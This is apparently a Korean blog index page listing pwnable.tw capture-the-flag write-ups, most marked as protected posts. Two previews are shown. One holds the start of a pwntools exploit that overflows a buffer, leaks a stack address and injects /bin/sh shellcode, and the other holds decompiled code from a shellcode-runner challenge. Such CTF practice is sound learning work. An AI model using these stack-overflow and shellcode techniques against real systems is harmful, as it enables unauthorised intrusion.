전체 글 (185) 썸네일형 리스트형 [pwnable.tw] applestore 보호되어 있는 글입니다. [pwnable.tw] Silver Bullet 보호되어 있는 글입니다. [pwnable.tw] hacknote 보호되어 있는 글입니다. [pwnable.tw] dubble sort 보호되어 있는 글입니다. [pwnable.tw] 3x17 보호되어 있는 글입니다. [pwnable.tw] calc 보호되어 있는 글입니다. [pwnable.tw] start from pwn import * context.lo_level = "debug" p = remote("chall.pwnable.tw", 10000) #p = process("./start") ret = 0x0804809c main = 0x08048087 leak = b"A" * 0x14 leak += p32(main) #leak += p32(ret) p.recvuntil(b":") p.send(leak) sleep(0.1) shell_addr = u32(p.recv(4)) log.info("shell code addr: " + hex(shell_addr)) shell = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\.. [pwnablw.tw] orw checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments description int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); (shellcode)(); return 0; } 쉘코드를 받고 실행시켜 줍니다 seccomp이 걸려있어 rule을 확인해보면 open, read, write이 열려 있어서 문제 이름처럼 orw .. 이전 1 2 3 4 5 6 7 ··· 24 다음